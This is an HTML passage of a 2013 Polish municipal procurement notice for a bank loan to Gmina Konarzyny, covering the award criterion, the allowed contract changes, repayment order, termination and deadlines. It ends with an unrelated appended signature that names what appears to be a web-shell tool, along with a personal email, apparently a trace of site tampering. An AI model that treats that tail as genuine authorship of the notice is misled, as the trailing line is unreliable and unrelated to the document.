<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zgodnie z treścią art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty Wykonawcy.2.	Zmiany istotnych postanowień umowy, na skutek wystąpienia poniższych okoliczności mogą dotyczyć:2.1	zmniejszenia kwoty kredytu:a)	wystąpienie siły wyższej b)	dobra sytuacja finansowa Zamawiającego w bieżącym roku budżetowym2.2	okresu kredytowania:a)	wystąpienie siły wyższej b)	zagrożenie utraty płynności finansowej Gminy Konarzyny2.3	zmiany harmonogramu spłat kredytu:a)	wystąpienie siły wyższej b)	zmniejszenie kwoty kredytu wpływające na zmianę wysokości rat kredytu2.4 zmiana nazw, siedziby stron, numeru rachunku bankowego, innych danych identyfikacyjnych 3.	Siła wyższa oznacza wyjątkowe wydarzenie lub okoliczność:	na którą Strony nie miały wpływu	przeciw której Strony nie mogły się zabezpieczyć przed zawarciem umowy	której nie można było w racjonalny sposób uniknąć lub przezwyciężyć	której nie można uznać za wywołaną w znaczącym stopniu przez żadną ze Stron.4.	Istotne zapisy jakie należy zawrzeć w  treści umowy do zamówienia publicznego4.1 	Kredytobiorca zobowiązuje się dokonać w okresie objętym umową spłaty rat kredytu w    terminach określonych w § 4 pkt 6. 4.2.	Termin spłaty kredytu i odsetek uważa się za zachowany z dniem wpływu na rachunek kredytowy Banku. Jeżeli termin płatności przypada na dzień uznany ustawowo za wolny od pracy, termin ten ulega przesunięciu na pierwszy dzień roboczy po tym dniu. 4.3.	Spłata kredytu, odsetek oraz innych zobowiązań Kredytobiorcy w kwocie niższej niż wynika to z bieżącego zadłużenia lub w późniejszym terminie niż wynika to z niniejszej   umowy, rozliczana będzie w następującej kolejności: 4.3.1	 koszty banku 4.3.2	 opłaty
 4.3.3	 odsetki od zadłużenia przeterminowanego 4.3.4 zadłużenie przeterminowane z tytułu kredytu 4.3.5 odsetki bieżące 4.3.6 zadłużenie z tytułu kredytu. 4.4.	Strony ustalają, iż Kredytobiorca może dokonać zmiany terminu spłaty kredytu bez ponoszenia dodatkowych kosztów na podstawie pisemnego powiadomienia Banku najpóźniej na 30 dni przed zamierzonym terminem spłaty po wyrażeniu zgody przez Bank i zawarciu aneksu do umowy. 4.5.	Wydłużenie okresu  kredytowania  może nastąpić po wyrażeniu zgody przez Bank i zawarciu aneksu do umowy oraz podjęciu uchwały przez Radę Gminy w Konarzynach w sprawie zmiany uchwały w sprawie zaciągnięcia kredytów długoterminowych w 2013 roku, jeśli termin spłaty wykraczałby poza 30 września 2025 roku.
 5.1. Kredytobiorca może wypowiedzieć umowę kredytu z zachowaniem 60-dniowego terminu. 5.2 Termin wypowiedzenia umowy kredytu przez Kredytobiorcę liczony jest od dnia  następnego po dniu doręczenia tego wypowiedzenia. 5.3 Za datę doręczenia zawiadomienia o wypowiedzeniu uznaje się dzień doręczenia zawiadomienia osobiście bądź listem poleconym za zwrotnym potwierdzeniem odbioru.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.konarzyny.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Konarzyny ul. szkolna 7 89-607 Konarzyny pok. nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2013 godzina 10:00, miejsce: Gmina Konarzyny ul. Szkolna 7 89-607 Konarzyny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com